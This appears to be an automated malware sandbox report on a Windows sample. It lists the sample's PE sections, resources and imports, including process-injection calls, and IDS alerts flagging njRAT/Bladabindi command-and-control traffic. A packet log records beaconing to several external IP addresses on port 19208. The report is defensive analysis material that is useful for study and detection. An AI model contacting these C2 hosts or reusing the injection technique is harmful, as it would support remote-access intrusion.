                                                                                        .data0xe0000x32fb40x33000ee2d57c265aa3a5bb323757aa2b27c78False0.34042777267156865data4.549128828468098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0x410000x10000x100000594881de82a393e2a0f071498f0f46False0.17138671875data1.623209958499508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_CURSOR0x411a80x134dataEnglishUnited States0.4577922077922078
                                                                                        RT_DIALOG0x412dc0x36dataEnglishUnited States0.7962962962962963
                                                                                        RT_DIALOG0x413140x42dataEnglishUnited States0.8181818181818182
                                                                                        RT_STRING0x413580x4adataEnglishUnited States0.6081081081081081
                                                                                        RT_GROUP_CURSOR0x413a40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                        RT_VERSION0x413b80x334dataEnglishUnited States0.4426829268292683
                                                                                        DLLImport
                                                                                        KERNEL32.DLLGetStartupInfoA, GetModuleHandleA, LoadLibraryA, ExitProcess, SetThreadContext, WriteProcessMemory, VirtualAllocEx, CreateProcessW, GetProcAddress, GetModuleFileNameW
                                                                                        GDI32.dllPolyPolygon, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, CreateCompatibleDC, LPtoDP, CreateCompatibleBitmap, GetMapMode, Polygon, PtInRegion, CreatePolygonRgn, CombineRgn, Polyline, BitBlt, DPtoLP
                                                                                        MFC42.DLL
                                                                                        MSVCRT.dll_except_handler3, __set_app_type, _setmbcp, __CxxFrameHandler, _ftol, wcslen, wcsstr, strstr, wcscat, wcscpy, __dllonexit, _onexit, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, _controlfp, __p__fmode, __p__commode
                                                                                        USER32.dllEnableWindow, GrayStringA, DrawTextA, TabbedTextOutA, LoadCursorA, SetCursor, ClientToScreen, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, LoadIconA, ReleaseCapture, GetWindowRect, SetWindowRgn, SetCapture, CopyRect
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        192.168.2.43.6.98.23249754192082033132 02/08/24-06:54:17.203251TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975419208192.168.2.43.6.98.232
                                                                                        192.168.2.43.6.98.23249753192082033132 02/08/24-06:53:47.167039TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975319208192.168.2.43.6.98.232
                                                                                        192.168.2.43.6.115.6449740192082033132 02/08/24-06:52:40.778707TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974019208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449750192082033132 02/08/24-06:53:17.004564TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975019208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449745192082033132 02/08/24-06:52:56.886497TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974519208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449746192082033132 02/08/24-06:53:02.654805TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974619208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449735192082033132 02/08/24-06:52:19.109017TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973519208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449736192082033132 02/08/24-06:52:23.314373TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973619208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449748192082033132 02/08/24-06:53:09.670781TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974819208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449737192082033132 02/08/24-06:52:28.873469TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973719208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449743192082033132 02/08/24-06:52:53.287877TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974319208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449747192082033132 02/08/24-06:53:05.744099TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974719208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449742192082033132 02/08/24-06:52:48.846165TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974219208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449739192082033132 02/08/24-06:52:37.039479TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973919208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.98.23249751192082033132 02/08/24-06:53:22.365303TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975119208192.168.2.43.6.98.232
                                                                                        192.168.2.43.6.115.18249755192082033132 02/08/24-06:54:57.629247TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975519208192.168.2.43.6.115.182
                                                                                        192.168.2.43.6.98.23249752192082033132 02/08/24-06:53:27.364368TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975219208192.168.2.43.6.98.232
                                                                                        192.168.2.43.6.115.6449738192082033132 02/08/24-06:52:32.434036TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973819208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449741192082033132 02/08/24-06:52:45.605256TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974119208192.168.2.43.6.115.64
                                                                                        192.168.2.43.6.115.6449749192082033132 02/08/24-06:53:13.881752TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974919208192.168.2.43.6.115.64
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Feb 8, 2024 06:52:16.918523073 CET4973519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:17.232906103 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:17.232985020 CET4973519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:17.899408102 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:18.021317005 CET4973519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:19.109016895 CET4973519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:19.420628071 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:19.420691013 CET4973519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:19.695369959 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:19.695389986 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:19.695974112 CET4973519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:19.732274055 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:20.007632971 CET19208497353.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:21.159702063 CET4973619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:21.470405102 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:21.470539093 CET4973619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:22.075583935 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:22.224323988 CET4973619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:23.314373016 CET4973619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:23.626043081 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:23.626132965 CET4973619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:23.870831966 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:23.871077061 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:23.871145964 CET4973619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:23.937096119 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:24.181664944 CET19208497363.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:25.401853085 CET4973719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:25.717850924 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:25.718301058 CET4973719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:26.334085941 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:26.521281004 CET4973719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:28.873469114 CET4973719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:29.189502954 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:29.189903975 CET4973719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:29.395960093 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:29.396024942 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:29.396320105 CET4973719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:29.505858898 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:29.712327003 CET19208497373.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:30.956058025 CET4973819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:31.272542000 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:31.272733927 CET4973819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:31.897855997 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:32.036915064 CET4973819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:32.434036016 CET4973819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:32.750375032 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:32.750559092 CET4973819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:32.969711065 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:32.969969988 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:32.970120907 CET4973819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:33.067148924 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:33.287281036 CET19208497383.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:34.511887074 CET4973919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:34.819303036 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:34.819529057 CET4973919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:35.438219070 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:35.614934921 CET4973919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:37.039479017 CET4973919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:37.346621037 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:37.346828938 CET4973919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:37.567574978 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:37.567599058 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:37.567765951 CET4973919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:37.653840065 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:37.874906063 CET19208497393.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:39.073712111 CET4974019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:39.381108999 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:39.381196022 CET4974019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:40.039539099 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:40.224311113 CET4974019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:40.778707027 CET4974019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:41.085767984 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:41.085850954 CET4974019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:41.304913044 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:41.304932117 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:41.304994106 CET4974019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:41.392884970 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:41.611957073 CET19208497403.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:42.788156986 CET4974119208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:43.098881960 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:43.098999023 CET4974119208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:43.701802969 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:43.927443981 CET4974119208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:45.605256081 CET4974119208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:45.916361094 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:45.916408062 CET4974119208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:46.157058001 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:46.166770935 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:46.167069912 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:46.167279959 CET4974119208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:46.226820946 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:46.477857113 CET19208497413.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:47.638750076 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:47.953180075 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:47.953282118 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:48.618848085 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:48.696115971 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:48.846164942 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:49.160322905 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:49.160445929 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:49.359652996 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:49.367676020 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:49.367727041 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:49.367743969 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:49.367821932 CET4974219208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:49.474631071 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:49.681912899 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:49.681952953 CET19208497423.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:50.873823881 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:51.183826923 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:51.184030056 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:51.823415041 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:52.021461964 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:53.287877083 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:53.597979069 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:53.598280907 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:53.805542946 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:53.805568933 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:53.805639982 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:53.805753946 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:53.805753946 CET4974319208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:53.908154964 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:54.115638971 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:54.115658998 CET19208497433.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:55.317816973 CET4974519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:55.635162115 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:55.635271072 CET4974519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:56.289158106 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:56.427463055 CET4974519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:56.886497021 CET4974519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:57.204763889 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:57.204844952 CET4974519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:57.417884111 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:57.417987108 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:57.418059111 CET4974519208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:57.521555901 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:57.734498024 CET19208497453.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:58.954699993 CET4974619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:59.271222115 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:52:59.271356106 CET4974619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:52:59.929399014 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:00.114921093 CET4974619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:02.654804945 CET4974619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:02.971333981 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:02.971540928 CET4974619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:03.191222906 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:03.191256046 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:03.191299915 CET4974619208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:03.288253069 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:03.507889986 CET19208497463.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:04.695415974 CET4974719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:05.002795935 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:05.002902031 CET4974719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:05.601321936 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:05.724286079 CET4974719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:05.744098902 CET4974719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:06.051457882 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:06.051598072 CET4974719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:06.281382084 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:06.281409025 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:06.281554937 CET4974719208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:06.358928919 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:06.588835955 CET19208497473.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:07.811352015 CET4974819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:08.124687910 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:08.124778986 CET4974819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:08.735963106 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:08.912024021 CET4974819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:09.670780897 CET4974819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:09.984121084 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:09.984297037 CET4974819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:10.201806068 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:10.201828957 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:10.201894999 CET4974819208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:10.297754049 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:10.515765905 CET19208497483.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:11.718614101 CET4974919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:12.028656960 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:12.028742075 CET4974919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:12.701911926 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:12.818131924 CET4974919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:13.881752014 CET4974919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:14.193500042 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:14.193775892 CET4974919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:14.407618999 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:14.407684088 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:14.407747030 CET4974919208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:14.503679991 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:14.717931986 CET19208497493.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:15.935183048 CET4975019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:16.244921923 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:16.245023012 CET4975019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:16.854620934 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:16.911806107 CET4975019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:17.004564047 CET4975019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:17.314510107 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:17.314757109 CET4975019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:17.568639040 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:17.568665028 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:17.568731070 CET4975019208192.168.2.43.6.115.64
                                                                                        Feb 8, 2024 06:53:17.624469042 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:17.879414082 CET19208497503.6.115.64192.168.2.4
                                                                                        Feb 8, 2024 06:53:20.008032084 CET4975119208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:20.321981907 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:20.322130919 CET4975119208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:21.049010038 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:21.224282026 CET4975119208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:22.365303040 CET4975119208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:22.678221941 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:22.678919077 CET4975119208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:22.919680119 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:22.922563076 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:22.922597885 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:22.922657013 CET4975119208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:22.991986990 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:23.235651016 CET19208497513.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:24.951441050 CET4975219208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:25.265242100 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:25.265315056 CET4975219208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:25.933825970 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:26.114947081 CET4975219208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:27.364367962 CET4975219208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:27.674191952 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:27.674321890 CET4975219208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:27.918960094 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:27.918981075 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:27.919070959 CET4975219208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:27.986257076 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:28.229434013 CET19208497523.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:29.578706026 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:29.893304110 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:29.893543005 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:30.585926056 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:30.724319935 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:46.051244974 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:46.051456928 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:47.167038918 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:47.481920958 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:47.482033968 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:47.687119007 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:47.695275068 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:47.695477962 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:47.700843096 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:47.700917959 CET4975319208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:47.796653032 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:48.010262012 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:48.015302896 CET19208497533.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:51.925764084 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:52.237373114 CET19208497543.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:52.237663031 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:53:52.840913057 CET19208497543.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:53:52.912017107 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:54:08.227086067 CET19208497543.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:54:08.227163076 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:54:17.203250885 CET4975419208192.168.2.43.6.98.232
                                                                                        Feb 8, 2024 06:54:17.515252113 CET19208497543.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:54:17.728889942 CET19208497543.6.98.232192.168.2.4
                                                                                        Feb 8, 2024 06:54:17.728907108 CET19208497543.6.98.232192.168.2.4
